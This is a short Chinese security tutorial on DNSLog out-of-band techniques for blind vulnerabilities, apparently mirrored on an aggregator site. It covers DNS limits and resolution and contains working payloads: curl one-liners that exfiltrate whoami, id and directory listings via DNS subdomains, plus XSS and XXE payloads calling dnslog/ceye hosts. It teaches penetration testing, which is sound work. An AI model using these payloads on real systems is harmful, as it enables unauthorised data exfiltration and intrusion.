当前位置: 首页 > news >正文

网安-DNSlog

目录

DNSLog解决无回显

DNSLog利用限制

DNS解析流程

Windows环境变量大全

Linux下DNSLog利用

dns平台

XSS

XXE

SSRF


DNSLog解决无回显

带外攻击(OOB=Out of Bind)

DNSLog利用限制

1.域名层级:一般不超过5级
2.每级域名最大长度:63个ASCII字符
3.总域名长度:253个ASCII字符
4.内容限制:数字、字母、下划线
5.适用漏洞:RCE、XXE、SSRF、SQL注入、JNDI注入、反序列化等

DNS解析流程

1.hosts文件(C:\Windows\System32\drivers\etc\hosts)
2.DNS缓存(ipconfig /displaydns)
3.本地DNS服务器(路由器自身,转发给上层)
4.根DNS服务器(Root Server),13组集群服务器
5.顶级域名DNS服务器(Top Level Domain Server),如.com、.cn、.org等
6.Name Server域名服务器的地址(域名服务商提供)

Windows环境变量大全

Windows系统环境变量大全 - edolf - 博客园

Linux下DNSLog利用


获取变量值:
curl http://`whoami`.xxxxxx.dnslog.cn/
base64编码输出:
curl http://$(id|base64).xxxxxx.dnslog.cn/
循环获取文件输出:
for i in $(ls/);do curl "http://$i.xxxxxx.dnslog.cn/";done;

dns平台

登录 - DNSlog System
登录
DNSLog Platform
CEYE - Monitor service for security testing
1.常用payloads
2.在线查询记录(HTTP/DNS),可下载
3.提供在线API,各种编程语言可调用
4.DNS Rebinding Server
DNS Rebinding Bypass SSRF-先知社区

XSS

<script src = haha.z6iktj.ceye.io></script>

 dnslog反应

XXE

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://hahaha.skhn7t.dnslog.cn">%remote;]>

 <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://hahaha.z6iktj.ceye.io">
%remote;]>
<root/>

 

SSRF

http://www.dtcms.com/a/286055.html

相关文章:

  • 第三章自定义检视面板_创建自定义编辑器类_检测与应用修改(本章进度(2/9))
  • 可靠消息最终一致性分布式事务解决方案
  • 补贴退坡、平价上网,数字隔离器如何守护更高功率的光伏逆变器?
  • 门控线性单元GLU (Gated Linear Unit)
  • ApplicationContext 事件发布与监听机制详解
  • 反射机制的登录系统
  • PHP 8.0 升级到 PHP 8.1
  • 创建型模式
  • 基于 HT 的 3D 可视化智慧矿山开发实现
  • 从一开始的网络攻防(四):XSS
  • hadoop(服务器伪分布式搭建)
  • FastAdmin后台登录地址变更原理与手动修改方法-后台入口机制原理解析-优雅草卓伊凡
  • Hadoop安全机制深度剖析:Kerberos认证与HDFS ACL细粒度权限控制
  • 《Web安全之深度学习实战》读书笔记总结
  • AI赋能轮胎安全:基于YOLO11的智能裂纹检测系统
  • 基于springboot+vue+mysql的智慧社区设计与实现(源码+论文+开题报告)
  • Docker Swarm 集群使用记录
  • Matlab打开慢、加载慢的解决办法
  • 免费的一些工具收集
  • 【Oracle】centos7离线静默安装oracle11g(p13390677_112040)
  • Hive 向量化执行引擎 Vectorized Execution 常见 NPE 报错分析及解决
  • 全球天气预报5天(经纬度版)免费API接口教程
  • Python绘制数据(二)
  • JAVA面试宝典 -《微服务治理:从链路追踪到熔断》
  • 某邮生活旋转验证码识别
  • 算法竞赛备赛——【图论】求最短路径——小结
  • 前端之CSS
  • MyBatis之关联查询
  • WEB安全架构
  • Tomcat及Nginx部署使用